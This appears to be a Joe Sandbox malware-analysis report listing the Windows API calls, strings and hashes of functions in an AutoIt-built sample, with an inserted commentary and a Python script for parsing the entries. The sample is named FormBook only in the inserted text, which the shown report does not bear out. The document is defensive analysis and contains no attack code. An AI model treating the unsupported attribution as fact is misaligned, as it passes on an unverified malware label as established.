                                                      • Opcode ID: 3e397b09643a3e4f528dba3f1856d0b7750907bdad0cfcf17d68d014912138e1
                                                      • Instruction ID: 8a5b871a8603cba8c342a83ad8ed96f048aed7f152c1ccb6f4c6ee3ab1c17e95
                                                      • Opcode Fuzzy Hash: 3e397b09643a3e4f528dba3f1856d0b7750907bdad0cfcf17d68d014912138e1
                                                      • Instruction Fuzzy Hash: 9F419FB240C3849ECB51EF64C491EEFB7E8AF88340F00482EB499C7161EA74D688C756
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE7519
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE75C0
                                                      • IsMenu.USER32(?), ref: 00AE75D8
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AE7620
                                                      • DrawMenuBar.USER32 ref: 00AE7633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 6a99594ef896d953cdde9620c2128b3925b2d6b7eaad6681e884b3b592031dfa
                                                      • Instruction ID: 066bf30c303659b22af8cd672860bed4d4de072ed1feed5ae383a256004e8210
                                                      • Opcode Fuzzy Hash: 6a99594ef896d953cdde9620c2128b3925b2d6b7eaad6681e884b3b592031dfa
                                                      • Instruction Fuzzy Hash: A5413875A04689EFDB20DF95D884EAEBBF8FF48314F048129E9159B250DB30AD51CFA0
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00AE125C
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE1286
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00AE133D
                                                        • Part of subcall function 00AE122D: RegCloseKey.ADVAPI32(?), ref: 00AE12A3
                                                        • Part of subcall function 00AE122D: FreeLibrary.KERNEL32(?), ref: 00AE12F5
                                                        • Part of subcall function 00AE122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AE1318
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AE12E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: c07cbb69f8ff25fc423dfe0e35e2dd6f63e3bb166b0d6dc269649ef9c80ce8c8
                                                      • Instruction ID: aede341f206c6e4ef1c977f18ac781ded0785dcf6175b741dadb467962483c1a
                                                      • Opcode Fuzzy Hash: c07cbb69f8ff25fc423dfe0e35e2dd6f63e3bb166b0d6dc269649ef9c80ce8c8
                                                      • Instruction Fuzzy Hash: 563108B1901169BFDB15DBD5DC89AFEB7BCEB08300F00016AE512E6151EA749F459BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AE655B
                                                      • GetWindowLongW.USER32(015956A8,000000F0), ref: 00AE658E
                                                      • GetWindowLongW.USER32(015956A8,000000F0), ref: 00AE65C3
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AE65F5
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AE661F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AE6630
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AE664A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: df978e46c0df2bed47430c2f4d4013407cf2f1c813be77aa9f85f05837f0baf3
                                                      • Instruction ID: f458fd7c493215b88f0a07b44f12e5f5d7a5c9a4bd88efb45e3eeb0433a805bc
                                                      • Opcode Fuzzy Hash: df978e46c0df2bed47430c2f4d4013407cf2f1c813be77aa9f85f05837f0baf3
                                                      • Instruction Fuzzy Hash: B931F230704290AFDB20CF5ADC89F553BE1FB6A790F1909A9F5118F2B5CB61A841DB61
                                                      APIs
                                                        • Part of subcall function 00AD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AD64D9
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD64E8
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AD6521
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00AD652A
                                                      • WSAGetLastError.WSOCK32 ref: 00AD6534
                                                      • closesocket.WSOCK32(00000000), ref: 00AD655D
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00AD6576
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: e4c63388c6f7860593e9f336b00803ff5e3835f19a3f22228b637b63b7c84433
                                                      • Instruction ID: d4697a40b5c948f273e755130fd1671ee0d39ed406d7249969db9652274c69cf
                                                      • Opcode Fuzzy Hash: e4c63388c6f7860593e9f336b00803ff5e3835f19a3f22228b637b63b7c84433
                                                      • Instruction Fuzzy Hash: B631B371600118AFDB10EF64DD85BBE7BBDEB44750F04806AF9069B391CB74AD45CB61
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ABE0FA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ABE120
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00ABE123
                                                      • SysAllocString.OLEAUT32 ref: 00ABE144
                                                      • SysFreeString.OLEAUT32 ref: 00ABE14D
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00ABE167
                                                      • SysAllocString.OLEAUT32(?), ref: 00ABE175
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 8500f5c5b69f6e6aa2949050d236f5692705ccd05309c9361c7fede5c9db0bad
                                                      • Instruction ID: 26b67a7837a97cbc9a78ca9dc8e4e29a6b06cb2ab421a9266cf16842ef8731a5
                                                      • Opcode Fuzzy Hash: 8500f5c5b69f6e6aa2949050d236f5692705ccd05309c9361c7fede5c9db0bad
                                                      • Instruction Fuzzy Hash: 57215675605108AFDB10EFACDC88DEB77ECEB19760B508235F915CB2A2DA70DD418B64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: c1b8c349abb2e9799fa9b1ae9ad2fb559d3423821da91b093e9915d9edba3748
                                                      • Instruction ID: b2d598c1f190b0004dde09736e4de962e4004ade7fbf58b6d400902142950f8a
                                                      • Opcode Fuzzy Hash: c1b8c349abb2e9799fa9b1ae9ad2fb559d3423821da91b093e9915d9edba3748
                                                      • Instruction Fuzzy Hash: E7213732104255AED734B724DE12FFBB7ACEF52740F188436F98586143EB51AE82D3A5
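The entry above is the one that ties this report to the "compiled AutoIt script" verdict: the function compares script lines against the directives `#OnAutoItStartRegister`, `#notrayicon` and `#requireadmin` with `__wcsnicmp`, which is interpreter behaviour rather than payload behaviour. When triaging many of these per-function entries, it helps to parse them rather than read them. The following Python is an added example and is not part of the Joe Sandbox report or its tooling; it assumes the entry layout exactly as rendered on this page (an `APIs` line opening each function, bullet lines of the form `Api.DLL(args), ref: addr`, indented `Part of subcall function` lines for calls made in callees, and `$`-joined `String ID` values) and the sample text is constructed by copying two of the entries above in abbreviated form.

```python
import re
from collections import Counter

# Constructed sample: two entries copied in abbreviated form from the report
# (the AutoIt-directive compare and the registry enumeration); dump-source lines omitted.
SAMPLE_REPORT = """\
APIs
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• Opcode ID: c1b8c349abb2e9799fa9b1ae9ad2fb559d3423821da91b093e9915d9edba3748
APIs
  • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
  • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0548
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE0588
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AE05D4
• RegCloseKey.ADVAPI32(00000000), ref: 00AE0624
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• Opcode ID: a5b8d315f3c5444ed6bda37078655fe4e16c43863042e3323e003815e198e223
"""

# One logged call: "<Api>.<DLL>(<args>), ref: <addr>", optionally prefixed with
# "Part of subcall function <addr>:" when the call was made inside a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<dll>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

def parse_entries(text):
    """Split the report into per-function entries; each starts at an 'APIs' line."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "fields": {}}
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        m = API_LINE.match(line)
        if m:
            cur["apis"].append({
                "api": m["api"], "dll": m["dll"], "ref": int(m["ref"], 16),
                "args": [a for a in (m["args"] or "").split(",") if a],
                "via_subcall": m["parent"] is not None,
            })
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"].strip()
    return entries

def string_ids(entry):
    """'String ID' is a '$'-joined list of the strings the function references."""
    return [s for s in entry["fields"].get("String ID", "").split("$") if s]

AUTOIT_DIRECTIVES = {"#requireadmin", "#notrayicon", "#OnAutoItStartRegister"}

def autoit_directive_hits(entries):
    """Entries whose referenced strings include AutoIt script directives;
    returns (opcode-id prefix, sorted directives) pairs."""
    hits = []
    for e in entries:
        found = AUTOIT_DIRECTIVES.intersection(string_ids(e))
        if found:
            hits.append((e["fields"].get("Opcode ID", "")[:16], sorted(found)))
    return hits

def dll_histogram(entries, include_subcalls=False):
    """Count logged calls per DLL; subcall lines are indirect and excluded by default."""
    c = Counter()
    for e in entries:
        for call in e["apis"]:
            if call["via_subcall"] and not include_subcalls:
                continue
            c[call["dll"]] += 1
    return c

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    print("AutoIt directive hits:", autoit_directive_hits(parsed))
    print("Direct calls per DLL:", dict(dll_histogram(parsed)))
```

The subcall flag matters when reading these entries: a `Part of subcall function` line is attributed to the function because a callee makes the call, so counting it as the function's own import inflates the histogram. The directive check is deliberately narrow; it identifies the AutoIt runtime, not the script it carries, and the FormBook behaviour the report flags lives in the injected payload rather than in these interpreter functions.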
                                                      APIs
                                                        • Part of subcall function 00A61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A61D73
                                                        • Part of subcall function 00A61D35: GetStockObject.GDI32(00000011), ref: 00A61D87
                                                        • Part of subcall function 00A61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A61D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AE78A1
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AE78AE
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AE78B9
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AE78C8
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AE78D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 4aebb418cb2a55c1f8444bacf283360be20d6c59c38c3f9fdd6cd85c356d1c9e
                                                      • Instruction ID: d208b87015971cdae94c4c5c4bea9f6057764533d6f98a026bd8e04bae904aa3
                                                      • Opcode Fuzzy Hash: 4aebb418cb2a55c1f8444bacf283360be20d6c59c38c3f9fdd6cd85c356d1c9e
                                                      • Instruction Fuzzy Hash: D21194B2550219BFEF159F61CC85EEB7F6DEF08758F014115FA04A60A0CB729C61DBA4
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A84292,?), ref: 00A841E3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A841EA
                                                      • EncodePointer.KERNEL32(00000000), ref: 00A841F6
                                                      • DecodePointer.KERNEL32(00000001,00A84292,?), ref: 00A84213
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 9acf3fe9117e04e41b219567e29c48b618a51bf256fad759455685c77b74bdf1
                                                      • Instruction ID: 26a319ac34b72333f3079b38ed8df35a4e9118851ef7cb85b9520c76561e9112
                                                      • Opcode Fuzzy Hash: 9acf3fe9117e04e41b219567e29c48b618a51bf256fad759455685c77b74bdf1
                                                      • Instruction Fuzzy Hash: D9E012B0590345EEEB20ABF0EC4DB543D94F764B03F504434B521EA4E0DBB540A38F00
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A841B8), ref: 00A842B8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A842BF
                                                      • EncodePointer.KERNEL32(00000000), ref: 00A842CA
                                                      • DecodePointer.KERNEL32(00A841B8), ref: 00A842E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 845ce1e9e50d253bc91af9963e05516c8920e0b9e33247af079d96abd38bcf68
                                                      • Instruction ID: f4e3584cdc4809895f72f37da415129319578ba640d92ada8f9cc71c04e88efe
                                                      • Opcode Fuzzy Hash: 845ce1e9e50d253bc91af9963e05516c8920e0b9e33247af079d96abd38bcf68
                                                      • Instruction Fuzzy Hash: 75E04678681306AFEB20EBA0EE4DB403EA4F728743F104428F610EA4A0CFB04453CB04
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                                      • Instruction ID: 2456fcf4a85491a541dfaf6b840b09c96539c2a7a6ff8c38c672b5dc076d9849
                                                      • Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
                                                      • Instruction Fuzzy Hash: 1B61BD3150065A9BCF11EF60CE82FFE37B8AF08308F054519F95A5B292DB34AD46CB91
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0548
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE0588
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00AE05AB
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AE05D4
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AE0617
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE0624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: a5b8d315f3c5444ed6bda37078655fe4e16c43863042e3323e003815e198e223
                                                      • Instruction ID: f9ee04ac44aa720364091d840e1db2097eaf91e75cad0431527a025f5f8570e4
                                                      • Opcode Fuzzy Hash: a5b8d315f3c5444ed6bda37078655fe4e16c43863042e3323e003815e198e223
                                                      • Instruction Fuzzy Hash: 91515931108280AFCB14EB65C985E6FBBF8FF88314F04891DF5859B2A2DB71E945CB52
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 00AE5A82
                                                      • GetMenuItemCount.USER32(00000000), ref: 00AE5AB9
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AE5AE1
                                                      • GetMenuItemID.USER32(?,?), ref: 00AE5B50
                                                      • GetSubMenu.USER32(?,?), ref: 00AE5B5E
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AE5BAF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: eefcbd0a58ac5f88f75be209e5c360cd2f038d5d54fcff08c95f4b5092e6f6a2
                                                      • Instruction ID: 22ab8da48cef47987049120f7c816fe34dc7b969d4aa88be91c4828144d51c9d
                                                      • Opcode Fuzzy Hash: eefcbd0a58ac5f88f75be209e5c360cd2f038d5d54fcff08c95f4b5092e6f6a2
                                                      • Instruction Fuzzy Hash: F0519C32E00655EFCF15EFA5D985AAEB7B4EF48324F144469F802BB351DB30AE418B90
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00ABF3F7
                                                      • VariantClear.OLEAUT32(00000013), ref: 00ABF469
                                                      • VariantClear.OLEAUT32(00000000), ref: 00ABF4C4
                                                      • _memmove.LIBCMT ref: 00ABF4EE
                                                      • VariantClear.OLEAUT32(?), ref: 00ABF53B
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ABF569
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 845341a0ca59d3850597dcd6cd6549f87dcae831d7c85c1b0c177333b947b019
                                                      • Instruction ID: adc0e765727db6da3e8f3628332ee0fc318c748bd2f7b656ae9fc82c95bca4b6
                                                      • Opcode Fuzzy Hash: 845341a0ca59d3850597dcd6cd6549f87dcae831d7c85c1b0c177333b947b019
                                                      • Instruction Fuzzy Hash: B75168B5A00209EFCB20DF58D880EAAB7B8FF4C314B158169ED59DB341D730E912CBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2747
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2792
                                                      • IsMenu.USER32(00000000), ref: 00AC27B2
                                                      • CreatePopupMenu.USER32 ref: 00AC27E6
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00AC2844
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AC2875
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
